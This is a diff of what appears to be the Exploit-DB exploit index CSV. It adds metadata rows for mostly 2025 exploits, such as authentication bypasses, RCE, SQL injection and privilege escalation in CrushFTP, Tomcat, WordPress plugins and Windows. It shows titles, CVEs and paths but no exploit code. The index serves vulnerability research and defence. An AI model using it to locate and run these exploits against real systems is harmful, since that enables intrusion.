19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
@ -10607,6 +10612,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@ -10616,6 +10622,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info
31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info
32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info
52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,,
25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info
25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info
32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info
@ -10736,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,,
9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,,
27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info
52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,,
20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info
33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info
21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info
@ -10788,6 +10797,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info
52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,,
22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py
@ -10863,6 +10873,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,,
52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
@ -10929,6 +10940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@ -10990,6 +11002,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info
39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info
39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info
52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,,
52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,,
33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info
38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info
31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info
@ -11076,6 +11090,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info
22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info
52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php
22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info
21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info
@ -11523,6 +11538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info
21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info
16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,,
52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,,
36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
@ -11827,6 +11843,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@ -12090,6 +12107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info
36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,,
42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,,
52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,,
14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,,
44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
@ -12494,6 +12512,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,
@ -12501,6 +12521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
33937,exploits/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,webapps,multiple,,2010-05-05,2016-09-26,1,,,,,,https://www.securityfocus.com/bid/39926/info
52137,exploits/multiple/webapps/52137.txt,"WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation",2025-04-08,"Al Baradi Joy",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
52302,exploits/multiple/webapps/52302.py,"WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass",2025-05-25,"Mohammed Idrees Banyamer",webapps,multiple,,2025-05-25,2025-05-25,0,CVE-2025-2594,,,,,
37573,exploits/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",webapps,multiple,,2012-08-06,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54812/info
40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
@ -16114,6 +16135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11162,exploits/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",webapps,php,,2010-01-15,,1,OSVDB-61811,,,,,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,,2019-10-25,2019-10-25,0,CVE-2019-18418,,,,,
30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php,,2007-05-22,2013-12-06,1,,,,,,https://www.securityfocus.com/bid/24101/info
52314,exploits/php/webapps/52314.txt,"CloudClassroom PHP Project 1.0 - SQL Injection",2025-06-05,"Sanjay Singh",webapps,php,,2025-06-05,2025-06-05,0,CVE-2025-45542,,,,,
19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php,,2012-07-03,2012-07-03,0,OSVDB-83690,,,,,
19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php,,2012-07-05,2012-07-05,0,OSVDB-84678;OSVDB-84677;OSVDB-84676;OSVDB-84675;OSVDB-84674;OSVDB-84673,,,,,https://www.vulnerability-lab.com/get_content.php?id=574
12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,webapps,php,,2010-04-26,,1,OSVDB-64098;CVE-2010-1660,,,,,
@ -41368,6 +41390,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,,2008-10-07,2018-12-18,1,,,2008-Churrasco.zip,,,
35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows,,2015-01-29,2015-01-29,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,,,
37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows,,2015-08-15,2016-10-27,0,CVE-2014-4076;OSVDB-114532;MS14-070,,,http://www.exploit-db.com/screenshots/idlt38000/ms14-070.jpg,,
52301,exploits/windows/local/52301.c,"Microsoft Windows Server 2016 - Win32k Elevation of Privilege",2025-05-25,"Milad karimi",local,windows,,2025-05-25,2025-05-25,0,CVE-2023-29336,,,,,
43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,,2018-02-02,2018-02-02,1,CVE-2018-0743,Local,,,,https://raw.githubusercontent.com/saaramar/execve_exploit/master/exploit.c
353,exploits/windows/local/353.c,"Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)",2004-07-18,anonymous,local,windows,,2004-07-17,2019-03-28,1,OSVDB-7798;CVE-2004-0212;MS04-022,,,,,
38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows,,2015-09-15,2015-09-15,1,CVE-2015-2525;OSVDB-127204,,,,,https://code.google.com/p/google-security-research/issues/detail?id=442
@ -44727,6 +44750,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445,2006-09-12,,1,OSVDB-27845;CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0008,,,,,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,,2019-10-29,2020-12-11,0,CVE-2015-0009,,,,,
